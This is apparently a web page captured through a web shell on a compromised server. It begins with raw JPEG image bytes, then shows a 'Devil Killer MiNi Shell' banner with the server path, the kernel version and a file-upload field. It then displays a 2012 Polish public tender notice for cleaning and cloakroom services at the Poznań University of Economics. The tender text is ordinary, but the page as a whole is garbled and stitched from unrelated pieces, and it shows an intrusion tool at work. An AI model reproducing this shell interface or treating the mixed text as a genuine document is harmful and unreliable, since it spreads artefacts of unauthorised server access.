JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121129/478704-N-2012.html

<p class="kh_header"><b>Poznań: Sprzątanie pomieszczeń oraz obsługa szatni w budynkach Uniwersytetu Ekonomicznego w Poznaniu</b><br>
<b>Numer ogłoszenia: 478704 - 2012; data zamieszczenia: 29.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Ekonomiczny w Poznaniu , al. Niepodległości 10, 61-875 Poznań, woj. wielkopolskie, tel. 061 8569000, 8569500, faks 061 8543988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ue.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń oraz obsługa szatni w budynkach Uniwersytetu Ekonomicznego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A: Usługa sprzątania pomieszczeń i utrzymania całodziennej czystości w pomieszczeniach bud. B Uniwersytetu Ekonomicznego w Poznaniu, przy al. Niepodległości 12
Część B: Obsługa szatni w budynku C Uniwersytetu Ekonomicznego w Poznaniu przy ul. Towarowej 53.
1.Część A: Przedmiotem zamówienia w części A jest usługa sprzątania pomieszczeń i utrzymania całodziennej czystości pomieszczeń w bud. B Uniwersytetu Ekonomicznego w Poznaniu, usytuowanego w Poznaniu przy al. Niepodległości 12. Usługa utrzymania czystości pomieszczeń polega na: 1.1.Codziennym sprzątaniu pomieszczeń biurowych, sal wykładowych, pomieszczeń Katedr Wydziału Towaroznawstwa (wraz z laboratoriami), laboratoriów komputerowych, sanitariatów, ciągów komunikacyjnych, pomieszczeń Parlamentu Studenckiego oraz windy osobowej. 1.2.Codziennym dyżurze w godz. 8.00 - 20.00 jednej osoby sprzątającej, w celu bieżącego utrzymania czystości, również w soboty i niedziele (z wyłączeniem okresu wakacyjnego). 1.3.Sprzątaniu kotłowni gazowej - jeden raz w miesiącu. 1.4.Dwukrotnym w roku: wiosną (marzec/kwiecień) oraz jesienią (wrzesień/październik) myciu okien oraz powierzchni przeszklonych (w tym raz w roku, wiosną, myciu konstrukcji przeszklonych kabiny, szybu windy osobowej), myciu żaluzji aluminiowych. 1.5.Jednokrotnym w ciągu roku akrylowaniu wykładzin PCV, czyszczeniu wykładzin dywanowych, siedzisk tapicerowanych krzeseł w salach wykładowych i laboratoriach komputerowych.  1.6.W koszt sprzątania należy również wkalkulować (zgodnie z wykazem zawartym w szczegółowym opisie przedmiotu zamówienia - załączniku nr 8 - część A): 1.6.1.Koszt środków czystości w tym także wszelkich środków czyszczących, papieru toaletowego, mydła w płynie, ręczników papierowych, worków do śmieci, środków dezynfekujących i zapachowych. 1.6.2.Codzienny dyżur osoby sprzątającej w godz. 8.00 -20.00 (od 02 stycznia do 30 czerwca i od 15 września do 22 grudnia), jak również w każdą sobotę i niedzielę roku akademickiego, pracę minimum 2 osób, które do godziny 8.00 posprzątają sale wykładowe, laboratoria komputerowe, laboratoria Wydziału Towaroznawstwa, toalety, ciągi komunikacyjne, windę osobową. 1.6.3.W cenę mycia okien należy wliczyć mycie ram, parapetów wewnętrznych i zewnętrznych oraz koszt środków myjących.  1.6.4.W koszt mycia konstrukcji przeszklonych dźwigu osobowego należy wliczyć koszt mycia ścian kabiny dźwigu osobowego, drzwi szklanych na każdej kondygnacji oraz przeszklonego szybu windy. W kosztach mycia szybu windy należy uwzględnić koszt wynajęcia podnośnika koszowego lub zatrudnienie osoby posiadającej uprawnienia alpinistyczne.
2.Część B: Codzienna obsługa szatni (150 numerków) w budynku C Uniwersytetu Ekonomicznego w Poznaniu przy ul. Towarowej 53, w godz. 7.30 - 21.30, przez okres dziewięciu miesięcy: 03 styczeń -31 maja 2013 r. oraz 01 października 2013 r. - 31 stycznia 2014 r. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 8 - część B.
3.Wykonawca gwarantuje niezmienność ceny usługi w okresie trwania umowy.
4.Wykonawca będzie realizował zamówienie z zachowaniem obowiązujących przepisów bezpieczeństwa i higieny pracy
Uwaga: Wykonawca zobowiązany jest do bardzo starannego zapoznania się z przedmiotem zamówienia, warunkami wykonania usługi i wszystkimi czynnikami mogącymi mieć wpływ na cenę zamówienia (zaleca się dokonanie wizji lokalnej obiektów)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w części A w zakresie zamówienia i do maksymalnej wysokości 30% wartości tej części.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.90.00-2, 98.31.00.00-9, 90.91.13.00-9, 98.30.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu, zobowiązany jest wnieść wadium w terminie do 10 grudnia 2012 r. godz. 08:00 - w wysokości:
Część A - 4.000 zł
Część B - 1.000 zł
na konto Uniwersytetu Ekonomicznego w Poznaniu, al. Niepodległości 10 w BZ WBK 3 Oddział Poznań 54 10901359 00000000 35018918 lub wadium w formie poręczeń bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancji bankowych, gwarancji ubezpieczeniowych lub w formie poręczeń udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 	Wadium musi być ważne przez okres związania ofertą. Oferta nie zabezpieczona wadium w wymaganej formie, zostanie odrzucona bez rozpatrzenia. 	Kserokopię dowodu wniesienia wadium lub gwarancji (poręczenia) należy załączyć do oferty.	 Oryginał gwarancji lub poręczenia należy złożyć w miejscu składania ofert przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie: 1.Udokumentowane doświadczenie w wykonywaniu usługi odpowiadającej swoim rodzajem i wartością usłudze, będącej przedmiotem zamówienia. Wykaz wykonanej / wykonywanej min. 1 usługi sprzątania pomieszczeń biurowych przez okres co najmniej roku (w ciągłości), wykonanej / wykonywanej w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego o wartości minimalnej 100.000 PLN netto. Należy podać wartość wykonanych / wykonywanych usług, przedmiot, daty wykonywania usług, dane zamawiającego oraz dokumenty potwierdzające należyte wykonanie / wykonywanie usług (referencje) - dotyczy części A zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał techniczny. 1.Zapewnienie wykonywania usługi przy użyciu odkurzaczy przemysłowych o mocy 1000 - 1200 W, worek na kurz o poj.15 l. Odkurzacze winny być wyposażone w szczotki obrotowe - ocena na podstawie wykazu posiadanego sprzętu - dotyczy części A zamówienia. 2.Posiadanie oraz wykorzystanie przez Wykonawcę podczas świadczenia usług porządkowych, specjalistycznego sprzętu do czyszczenia wykładzin dywanowych, tapicerki meblowej, oraz sprzętu do czyszczenia posadzek z granitogresu - ekstraktorów, szorowarek, urządzeń do prania wykładzin na mokro - ocena na podstawie wykazu posiadanego sprzętu - dotyczy części A zamówienia. 3.Dyspozycyjność i dostosowanie terminu wykonania usługi do potrzeb Zamawiającego - ocena oświadczenia nt. dyspozycyjności - dotyczy części A zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonywania zamówienia 1.Wykonawca winien dysponować co najmniej 5 osobami zdolnymi do wykonania zamówienia określonego w pkt. 5.1.1. - 5.1.2. (osoby sprzątające - minimum 1 osoba na każdej kondygnacji), przeszkolonymi z zakresu obowiązujących przepisów bezpieczeństwa i higieny pracy - dotyczy części A zamówienia. 2.Wykonawca winien dysponować minimum 2 osobami zdolnymi do wykonania zamówienia określonego w pkt. 5.2. SIWZ - dotyczy części B zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa. 1.Udokumentowane posiadanie aktualnego ubezpieczenia OC na kwotę min. 100.000 zł (lub równowartość) w tym 20.000 zł (lub równowartość) na jedno zdarzenie - ocena spełnienia warunku - kopia aktualnej polisy ubezpieczeniowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;">opis urządzeń technicznych, instrukcję obsługi oraz środków stosowanych przez wykonawcę dostaw lub usług oraz opis zaplecza naukowo-badawczego wykonawcy, w celu potwierdzenia zapewnienia odpowiedniej jakości realizowanego zamówienia</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Dokumenty (referencje) potwierdzające przeprowadzenie z należytą starannością usług wymienionych w pkt.7.2.1. - dotyczy części A zamówienia
2.	Oświadczenie Wykonawcy nt. dyspozycyjności, dostosowania terminu wykonania usługi do potrzeb Zamawiającego - załącznik nr 10.
3.	Informacja Wykonawcy o rodzaju stosowanych środków czystościowych, dezynfekujących, zapachowych wraz z ich kartami charakterystyki. Zamawiający do codziennego sprzątania oczekuje środków typu: Domestos, Ajax, Cleanolux, Sidolux, Pronto, Tytan, środki zapachowe typu Brise. Podane nazwy są przykładami - dopuszczalne są środki równoważne jakościowo. W przypadku zaoferowania środków innych marek, Wykonawca zobowiązany jest do złożenia pisemnego oświadczenia o równoważności jakościowej oferowanych środków z wyżej wymienionymi. Nie złożenie takiego oświadczenia, skutkować będzie odrzuceniem ofert (dotyczy części A zamówienia).
4.	Oświadczenie Wykonawcy o niezmienności rodzaju oraz jakości oferowanych i stosowanych środków czystościowych, dezynfekujących, zapachowych przez cały okres obowiązywania umowy - załącznik nr 9 (dotyczy części A zamówienia).</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pisemne oświadczenie Wykonawcy o braku zaległości podatkowych oraz o braku zaległości w opłacaniu składek na ubezpieczenie społeczne - załącznik nr 4
2.	Wypełniony i podpisany formularz oferty - załącznik nr 1
3.	Wypełniony i podpisany formularz cenowy - załącznik nr 6
4.	Osoba podpisująca ofertę lub poświadczająca zgodność dokumentów musi być do tego umocowana prawnie wg dokumentów rejestrowych albo na podstawie stosownego pełnomocnictwa. Pełnomocnictwo do reprezentowania Wykonawcy musi być dołączone w oryginale albo poświadczone notarialnie lub potwierdzone za zgodność przez Wystawcę. 
5.	Podpisany przez Wykonawcę szczegółowy opis przedmiotu zamówienia - załącznik nr 8.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art.144 ust.1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmian w umowie o udzielenie zamówienia publicznego po jego zawarciu, pod warunkiem podpisania aneksu zaakceptowanego przez obie strony. Zmiany te, zgodnie z zapisami art.140 ust.3 ustawy Prawo zamówień publicznych, nie mogą  wykraczać poza określenie przedmiotu zamówienia zawarte w SIWZ.
W szczególności Zamawiający dopuszcza:
a) aktualizację danych Wykonawcy poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej Wykonawcy itp.
b) zmianę stawki podatku VAT
c) zmianę terminu realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub Zamawiającego, które to przyczyny każda ze stron musi udokumentować.
d) zmniejszenie zakresu usług, będących przedmiotem zamówienia oraz związane z tym zmniejszenie wartości umowy, wynikające z przyczyn niezależnych od Zamawiającego lub Wykonawcy, które to przyczyny każda ze stron musi udokumentować.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ue.poznan.pl/uczelnia/uczelnia-dla-firm/zamówienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Ekonomiczny w Poznaniu
 61-875 Poznań, al. Niepodległości 10
 Budynek B, pok. 107.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 08:00, miejsce: Uniwersytet Ekonomiczny w Poznaniu
 61-875 Poznań, al. Niepodległości 10
 Budynek B, pok. 016 - Kancelaria UEP.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część A: Usługa sprzątania pomieszczeń i utrzymania całodziennej czystości w pomieszczeniach bud. B Uniwersytetu Ekonomicznego w Poznaniu, przy al. Niepodległości 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Część A: Przedmiotem zamówienia w części A jest usługa sprzątania pomieszczeń i utrzymania całodziennej czystości pomieszczeń w bud. B Uniwersytetu Ekonomicznego w Poznaniu, usytuowanego w Poznaniu przy al. Niepodległości 12. Usługa utrzymania czystości pomieszczeń polega na: 1.1.Codziennym sprzątaniu pomieszczeń biurowych, sal wykładowych, pomieszczeń Katedr Wydziału Towaroznawstwa (wraz z laboratoriami), laboratoriów komputerowych, sanitariatów, ciągów komunikacyjnych, pomieszczeń Parlamentu Studenckiego oraz windy osobowej. 1.2.Codziennym dyżurze w godz. 8.00 - 20.00 jednej osoby sprzątającej, w celu bieżącego utrzymania czystości, również w soboty i niedziele (z wyłączeniem okresu wakacyjnego). 1.3.Sprzątaniu kotłowni gazowej - jeden raz w miesiącu. 1.4.Dwukrotnym w roku: wiosną (marzec/kwiecień) oraz jesienią (wrzesień/październik) myciu okien oraz powierzchni przeszklonych (w tym raz w roku, wiosną, myciu konstrukcji przeszklonych kabiny, szybu windy osobowej), myciu żaluzji aluminiowych. 1.5.Jednokrotnym w ciągu roku akrylowaniu wykładzin PCV, czyszczeniu wykładzin dywanowych, siedzisk tapicerowanych krzeseł w salach wykładowych i laboratoriach komputerowych.  1.6.W koszt sprzątania należy również wkalkulować (zgodnie z wykazem zawartym w szczegółowym opisie przedmiotu zamówienia - załączniku nr 8 - część A): 1.6.1.Koszt środków czystości w tym także wszelkich środków czyszczących, papieru toaletowego, mydła w płynie, ręczników papierowych, worków do śmieci, środków dezynfekujących i zapachowych. 1.6.2.Codzienny dyżur osoby sprzątającej w godz. 8.00 -20.00 (od 02 stycznia do 30 czerwca i od 15 września do 22 grudnia), jak również w każdą sobotę i niedzielę roku akademickiego, pracę minimum 2 osób, które do godziny 8.00 posprzątają sale wykładowe, laboratoria komputerowe, laboratoria Wydziału Towaroznawstwa, toalety, ciągi komunikacyjne, windę osobową. 1.6.3.W cenę mycia okien należy wliczyć mycie ram, parapetów wewnętrznych i zewnętrznych oraz koszt środków myjących.  1.6.4.W koszt mycia konstrukcji przeszklonych dźwigu osobowego należy wliczyć koszt mycia ścian kabiny dźwigu osobowego, drzwi szklanych na każdej kondygnacji oraz przeszklonego szybu windy. W kosztach mycia szybu windy należy uwzględnić koszt wynajęcia podnośnika koszowego lub zatrudnienie osoby posiadającej uprawnienia alpinistyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część B: Obsługa szatni w budynku C Uniwersytetu Ekonomicznego w Poznaniu przy ul. Towarowej 53..</p>
